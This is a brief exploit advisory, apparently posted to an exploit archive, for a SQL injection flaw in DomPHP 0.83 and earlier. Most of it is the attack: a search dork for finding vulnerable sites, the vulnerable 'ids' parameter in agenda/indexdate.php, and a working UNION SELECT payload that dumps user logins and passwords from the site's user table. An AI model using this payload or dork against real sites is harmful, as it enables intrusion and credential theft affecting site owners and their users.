DomPHP versions 0.83 and below suffer from a remote SQL injection vulnerability.
cb2dcf35ad0fd792e1f894e8174876bc0f117e63ac62244dd54a12a0b864d723
-------------------------------------------------------------
DomPHP <= v0.83 SQL Injection Vulnerability
-------------------------------------------------------------
= Author : Houssamix
= Script : DomPHP <= v0.83
= Download : http://www.domphp.com/download/
= BUG : SQL Injection Vulnerability
= DORK : Site créé à l'aide du CMS DomPHP v0.83
= Exploit :
http://[target]/agenda/indexdate.php?ids=77 [SQL]
Exemple :
http://site.com/domphp/agenda/indexdate.php?ids=77 UNION SELECT 1,2,3,loginUtilisateur,5,6,passUtilisateur,8,9,10,11,12,13,14,15 from domphp_utilisateurs--